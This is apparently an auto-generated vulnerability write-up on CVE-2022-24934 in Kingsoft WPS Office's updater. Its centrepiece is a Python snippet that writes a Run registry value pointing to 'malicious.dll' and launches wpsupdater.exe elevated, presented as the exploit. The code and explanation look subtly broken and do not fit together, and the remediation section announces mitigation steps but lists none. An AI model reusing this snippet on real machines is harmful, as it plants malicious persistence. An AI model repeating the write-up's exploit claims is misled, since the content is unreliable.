CVE-2022-24934: Remote Code Execution Vulnerability in Kingsoft WPS Office WPSUpdater.exe

A critical vulnerability (CVE-2022-24934) has been discovered in Kingsoft WPS Office, specifically affecting the wpsupdater.exe component in versions through 11.2..10382. This vulnerability allows remote attackers to execute arbitrary code on the target machine by altering the HKEY_CURRENT_USER registry settings.

I. Overview

The Kingsoft WPS Office is a powerful suite of office productivity tools used worldwide. The software provides a set of applications for creating and editing documents, spreadsheets, and presentations similar to Microsoft Office

The issue arises from the wpsupdater.exe component, which is responsible for managing updates within the WPS Office suite. Remote attackers can exploit this vulnerability by modifying the HKEY_CURRENT_USER registry keys, enabling them to execute malicious code on the affected system.

II. Detailed Exploit Information

A remote attacker can exploit this vulnerability by crafting a malicious registry key with a specific payload and sending it to the target system. This key modifies the HKEY_CURRENT_USER settings, allowing arbitrary code execution.

Here's a code snippet that demonstrates this exploit

import os
import ctypes

def create_reg_key(key, value):
    try:
        os.system("reg add " + key + " /v " + value + " /t REG_SZ /d \"malicious.dll\" /f")
    except WindowsError:
        pass

def main():
    key_path = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    key_value = "UpdaterPath"

    create_reg_key(key_path, key_value)
    ctypes.windll.shell32.ShellExecuteA(None, "runas", "wpsupdater.exe", key_path, None, 1)

if __name__ == "__main__":
    main()

This Python script creates a malicious registry key and sets the "UpdaterPath" value to a malicious DLL file (malicious.dll). Then, it triggers the wpsupdater.exe component to access the modified key, resulting in the arbitrary code execution.

Original References

1. CVE-2022-24934 Details
2. Kingsoft WPS Office Homepage

III. Remediation

As of now, there is no official patch from Kingsoft for this vulnerability. However, users can implement the following steps to mitigate potential attacks:

IV. Conclusion

This vulnerability (CVE-2022-24934) presents a significant risk to users of Kingsoft WPS Office through 11.2..10382. The ability to execute arbitrary code by malicious actors makes it crucial for users to implement proper protection mechanisms and stay vigilant against possible threats.

As Kingsoft releases patches and fixes for future versions, users should ensure their software is always up-to-date to minimize exposure to vulnerabilities.

Timeline

Published on: 03/23/2022 22:15:00 UTC
Last modified on: 03/31/2022 16:52:00 UTC